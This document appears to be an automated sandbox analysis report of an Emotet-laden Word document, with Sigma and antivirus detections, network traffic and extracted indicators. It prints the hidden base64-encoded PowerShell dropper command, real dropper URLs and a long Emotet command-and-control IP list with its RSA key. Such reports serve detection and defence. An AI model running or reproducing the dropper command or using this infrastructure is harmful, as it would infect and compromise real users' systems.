                      Click to see the 67 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2360, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, ProcessId: 2460
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAK

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://norailya.com/drupal/retAl/Avira URL Cloud: Label: malware
                      Source: https://www.teelekded.com/cgi-bin/LPo/Avira URL Cloud: Label: malware
                      Source: http://calledtochange.org/CalledtoChange/8huSOd/Avira URL Cloud: Label: malware
                      Source: https://ummahstars.com/app_old_may_2018/assets/wDL8x/Avira URL Cloud: Label: malware
                      Source: https://hbprivileged.com/cgi-bin/Qg/Avira URL Cloud: Label: malware
                      Source: https://www.teelekded.com/cgi-bin/LPo/PAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 16.2.rundll32.exe.1d0000.1.unpackMalware Configuration Extractor: Emotet {"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "51.15.7.145:80", "177.85.167.10:80", "186.177.174.163:80", "190.114.254.163:8080", "185.183.16.47:80", "149.202.72.142:7080", "181.30.61.163:443", "31.27.59.105:80", "50.28.51.143:8080", "68.183.190.199:8080", "85.214.26.7:8080", "137.74.106.111:7080", "200.75.39.254:80", "85.105.239.184:443", "190.45.24.210:80", "170.81.48.2:80", "109.101.137.162:8080", "110.39.160.38:443", "110.39.162.2:443", "91.233.197.70:80", "51.255.165.160:8080", "213.52.74.198:80", "12.162.84.2:8080", "82.208.146.142:7080", "60.93.23.51:80", "172.245.248.239:8080", "104.131.41.185:8080", "93.149.120.214:80", "81.214.253.80:443", "190.247.139.101:80", "46.105.114.137:8080", "70.32.115.157:8080", "202.134.4.210:7080", "212.71.237.140:8080", "177.23.7.151:80", "111.67.12.221:8080", "197.232.36.108:80", "190.162.232.138:80", "80.15.100.37:80", "95.76.153.115:80", "154.127.113.242:80", "188.225.32.231:7080", "5.196.35.138:7080", "211.215.18.93:8080", "46.101.58.37:8080", "82.48.39.246:80", "181.10.46.92:80", "190.251.216.100:80", "187.162.248.237:80", "191.223.36.170:80", "138.197.99.250:8080", "201.48.121.65:443", "78.206.229.130:80", "190.210.246.253:80", "68.183.170.114:8080", "87.106.46.107:8080", "122.201.23.45:443", "70.32.84.74:8080", "143.0.85.206:7080", "190.64.88.186:443", "217.13.106.14:8080", "93.146.143.191:80", "188.135.15.49:80", "178.211.45.66:8080", "138.97.60.141:7080", "81.17.93.134:80", "83.169.21.32:7080", "152.231.89.226:80", "80.249.176.206:80", "178.250.54.208:8080", "206.189.232.2:8080", "46.43.2.95:8080", "190.24.243.186:80", "105.209.235.113:8080", "62.84.75.50:80", "152.170.79.100:80", "209.236.123.42:8080", "185.94.252.27:443", "12.163.208.58:80", "152.169.22.67:80", "1.226.84.243:8080", "191.241.233.198:80", "94.176.234.118:443", "209.33.120.130:80", "45.16.226.117:443", "81.215.230.173:443", "172.104.169.32:8080", "201.185.69.28:443", "167.71.148.58:443", "192.175.111.212:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: hbprivileged.comVirustotal: Detection: 7%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllReversingLabs: Detection: 85%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: ARCHIVOFile-20-012021.docVirustotal: Detection: 48%Perma Link
                      Source: ARCHIVOFile-20-012021.docReversingLabs: Detection: 50%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllJoe Sandbox ML: detected
                      Source: 10.2.rundll32.exe.6a0000.0.unpackAvira: Label: TR/ATRAPS.Gen

                      Compliance:

                      barindex
                      Uses insecure TLS / SSL version for HTTPS connectionShow sources
                      Source: unknownHTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: mscorlib.pdb` source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdbO source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107891055.0000000002820000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbles AA source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: global trafficDNS query: name: riandutra.com
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 177.12.170.95:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 191.6.196.95:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49175 -> 84.232.229.24:80
                      Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49176 -> 51.255.203.164:8080
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 84.232.229.24:80
                      Source: Malware configuration extractorIPs: 51.255.203.164:8080
                      Source: Malware configuration extractorIPs: 217.160.169.110:8080
                      Source: Malware configuration extractorIPs: 51.15.7.145:80
                      Source: Malware configuration extractorIPs: 177.85.167.10:80
                      Source: Malware configuration extractorIPs: 186.177.174.163:80
                      Source: Malware configuration extractorIPs: 190.114.254.163:8080
                      Source: Malware configuration extractorIPs: 185.183.16.47:80
                      Source: Malware configuration extractorIPs: 149.202.72.142:7080
                      Source: Malware configuration extractorIPs: 181.30.61.163:443
                      Source: Malware configuration extractorIPs: 31.27.59.105:80
                      Source: Malware configuration extractorIPs: 50.28.51.143:8080
                      Source: Malware configuration extractorIPs: 68.183.190.199:8080
                      Source: Malware configuration extractorIPs: 85.214.26.7:8080
                      Source: Malware configuration extractorIPs: 137.74.106.111:7080
                      Source: Malware configuration extractorIPs: 200.75.39.254:80
                      Source: Malware configuration extractorIPs: 85.105.239.184:443
                      Source: Malware configuration extractorIPs: 190.45.24.210:80
                      Source: Malware configuration extractorIPs: 170.81.48.2:80
                      Source: Malware configuration extractorIPs: 109.101.137.162:8080
                      Source: Malware configuration extractorIPs: 110.39.160.38:443
                      Source: Malware configuration extractorIPs: 110.39.162.2:443
                      Source: Malware configuration extractorIPs: 91.233.197.70:80
                      Source: Malware configuration extractorIPs: 51.255.165.160:8080
                      Source: Malware configuration extractorIPs: 213.52.74.198:80
                      Source: Malware configuration extractorIPs: 12.162.84.2:8080
                      Source: Malware configuration extractorIPs: 82.208.146.142:7080
                      Source: Malware configuration extractorIPs: 60.93.23.51:80
                      Source: Malware configuration extractorIPs: 172.245.248.239:8080
                      Source: Malware configuration extractorIPs: 104.131.41.185:8080
                      Source: Malware configuration extractorIPs: 93.149.120.214:80
                      Source: Malware configuration extractorIPs: 81.214.253.80:443
                      Source: Malware configuration extractorIPs: 190.247.139.101:80
                      Source: Malware configuration extractorIPs: 46.105.114.137:8080
                      Source: Malware configuration extractorIPs: 70.32.115.157:8080
                      Source: Malware configuration extractorIPs: 202.134.4.210:7080
                      Source: Malware configuration extractorIPs: 212.71.237.140:8080
                      Source: Malware configuration extractorIPs: 177.23.7.151:80
                      Source: Malware configuration extractorIPs: 111.67.12.221:8080
                      Source: Malware configuration extractorIPs: 197.232.36.108:80
                      Source: Malware configuration extractorIPs: 190.162.232.138:80
                      Source: Malware configuration extractorIPs: 80.15.100.37:80
                      Source: Malware configuration extractorIPs: 95.76.153.115:80
                      Source: Malware configuration extractorIPs: 154.127.113.242:80
                      Source: Malware configuration extractorIPs: 188.225.32.231:7080
                      Source: Malware configuration extractorIPs: 5.196.35.138:7080
                      Source: Malware configuration extractorIPs: 211.215.18.93:8080
                      Source: Malware configuration extractorIPs: 46.101.58.37:8080
                      Source: Malware configuration extractorIPs: 82.48.39.246:80
                      Source: Malware configuration extractorIPs: 181.10.46.92:80
                      Source: Malware configuration extractorIPs: 190.251.216.100:80
                      Source: Malware configuration extractorIPs: 187.162.248.237:80
                      Source: Malware configuration extractorIPs: 191.223.36.170:80
                      Source: Malware configuration extractorIPs: 138.197.99.250:8080
                      Source: Malware configuration extractorIPs: 201.48.121.65:443
                      Source: Malware configuration extractorIPs: 78.206.229.130:80
                      Source: Malware configuration extractorIPs: 190.210.246.253:80
                      Source: Malware configuration extractorIPs: 68.183.170.114:8080
                      Source: Malware configuration extractorIPs: 87.106.46.107:8080
                      Source: Malware configuration extractorIPs: 122.201.23.45:443
                      Source: Malware configuration extractorIPs: 70.32.84.74:8080
                      Source: Malware configuration extractorIPs: 143.0.85.206:7080
                      Source: Malware configuration extractorIPs: 190.64.88.186:443
                      Source: Malware configuration extractorIPs: 217.13.106.14:8080
                      Source: Malware configuration extractorIPs: 93.146.143.191:80
                      Source: Malware configuration extractorIPs: 188.135.15.49:80
                      Source: Malware configuration extractorIPs: 178.211.45.66:8080
                      Source: Malware configuration extractorIPs: 138.97.60.141:7080
                      Source: Malware configuration extractorIPs: 81.17.93.134:80
                      Source: Malware configuration extractorIPs: 83.169.21.32:7080
                      Source: Malware configuration extractorIPs: 152.231.89.226:80
                      Source: Malware configuration extractorIPs: 80.249.176.206:80
                      Source: Malware configuration extractorIPs: 178.250.54.208:8080
                      Source: Malware configuration extractorIPs: 206.189.232.2:8080
                      Source: Malware configuration extractorIPs: 46.43.2.95:8080
                      Source: Malware configuration extractorIPs: 190.24.243.186:80
                      Source: Malware configuration extractorIPs: 105.209.235.113:8080
                      Source: Malware configuration extractorIPs: 62.84.75.50:80
                      Source: Malware configuration extractorIPs: 152.170.79.100:80
                      Source: Malware configuration extractorIPs: 209.236.123.42:8080
                      Source: Malware configuration extractorIPs: 185.94.252.27:443
                      Source: Malware configuration extractorIPs: 12.163.208.58:80
                      Source: Malware configuration extractorIPs: 152.169.22.67:80
                      Source: Malware configuration extractorIPs: 1.226.84.243:8080
                      Source: Malware configuration extractorIPs: 191.241.233.198:80
                      Source: Malware configuration extractorIPs: 94.176.234.118:443
                      Source: Malware configuration extractorIPs: 209.33.120.130:80
                      Source: Malware configuration extractorIPs: 45.16.226.117:443
                      Source: Malware configuration extractorIPs: 81.215.230.173:443
                      Source: Malware configuration extractorIPs: 172.104.169.32:8080
                      Source: Malware configuration extractorIPs: 201.185.69.28:443
                      Source: Malware configuration extractorIPs: 167.71.148.58:443
                      Source: Malware configuration extractorIPs: 192.175.111.212:7080
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmpString found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmpString found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: http://riandutra.com/email/AfhE8z0/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: http://calledtochange.org/CalledtoChange/8huSOd/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://mrveggy.com/wp-admin/n/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://norailya.com/drupal/retAl/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://hbprivileged.com/cgi-bin/Qg/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://www.teelekded.com/cgi-bin/LPo/
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 51.255.203.164:8080
                      Source: global trafficHTTP traffic detected: GET /email/AfhE8z0/ HTTP/1.1Host: riandutra.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /CalledtoChange/8huSOd/ HTTP/1.1Host: calledtochange.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 191.6.196.95 191.6.196.95
                      Source: Joe Sandbox ViewASN Name: IPV6InternetLtdaBR IPV6InternetLtdaBR
                      Source: Joe Sandbox ViewASN Name: CRYSTALTECHUS CRYSTALTECHUS
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: unknownHTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D6EDBE-EB6B-4CC4-8C38-663EBE143117}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /email/AfhE8z0/ HTTP/1.1Host: riandutra.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /CalledtoChange/8huSOd/ HTTP/1.1Host: calledtochange.orgConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2102409234.000000000029B000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: riandutra.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 11:17:36 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 